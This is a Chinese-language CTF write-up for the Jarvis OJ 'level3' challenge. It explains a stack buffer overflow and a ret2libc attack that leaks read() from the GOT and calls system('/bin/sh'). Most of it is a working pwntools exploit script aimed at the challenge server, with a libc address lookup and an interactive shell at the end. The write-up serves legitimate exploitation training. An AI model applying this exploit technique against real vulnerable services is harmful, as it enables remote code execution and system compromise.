简介 :

项目地址 : https://coding.net/u/yihangwang/p/pwnme/git(pwn题目及 writeup 汇总)
下载地址 : https://dn.jarvisoj.com/challengefiles/level3.rar.1ce2f904ead905afbadd33de1d0c391d

分析 :

首先看到 vulnerable_function() 函数中的 read() 函数可以溢出
也就是说我们可以任意控制程序的流程 , 构造已知函数地址的所有函数调用栈
这样就可以使用 vulnerable_function() 中的 write() 函数将 got 表中的某一个函数地址打印出来
然后配合题目提供的 libc 文件计算 system() 函数的地址以及 "/bin/sh" 的地址
最后利用 vulnerable_function() 函数中的 read() 函数
继续溢出构造 system("/bin/sh") 的调用栈成功得到 shell

地址 :

nc pwn2.jarvisoj.com 9879

利用代码 :

#!/usr/bin/env python
# encoding:utf-8

from pwn import *

write_address = p32(0x08048340) # write() 函数在 plt 的地址
got_read_address = p32(0x0804A00C) # got 表中用于保存 read() 函数真实地址的内存地址

payload = "A" * 0x88 + "BBBB"
payload += write_address
payload += p32(0x0804844B) # vulnerable_function() 的地址
payload += p32(0x01) # write() 函数的第一个参数 , 表示文件描述符 , stdin (0)
payload += got_read_address # write() 函数的第二个参数 , 写入的数据
payload += p32(0x04) # write() 函数的第三个参数 , 表示写入的长度

# Io = process("./level3")
Io = remote('pwn2.jarvisoj.com',9879)
Io.recvuntil("Input:\n")
Io.send(payload)
temp = Io.recv(4)
read_address = u32(temp[0:4])
print hex(read_address)

# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc.so.6 | grep " read@"
#    958: 000d5980   101 FUNC    WEAK   DEFAULT   13 read@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc-2.19.so | grep " read@" 
#    950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc-2.19.so | grep " system@"
#   1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ readelf -a ./libc-2.19.so | grep " exit@" 
#    139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/jarvisoj/6$ strings -a -t x ./libc-2.19.so | grep "/bin/sh"
#  16084c /bin/sh


# read_libc_address = 0x000D5980
read_libc_address = 0x000daf60

offset = read_address - read_libc_address

# system_address = offset + 0x3ada0
system_address = offset + 0x00040310
print hex(system_address)
# exit_address = offset + 0x2e9d0
exit_address = offset + 0x00033260
print hex(exit_address)
# bin_sh_address = offset + 0x15b82b
bin_sh_address = offset + 0x16084c
print hex(bin_sh_address)

payload = "A" * 0x88 + "BBBB"
payload += p32(system_address)
payload += p32(exit_address)
payload += p32(bin_sh_address)

Io.sendline(payload)

Io.interactive()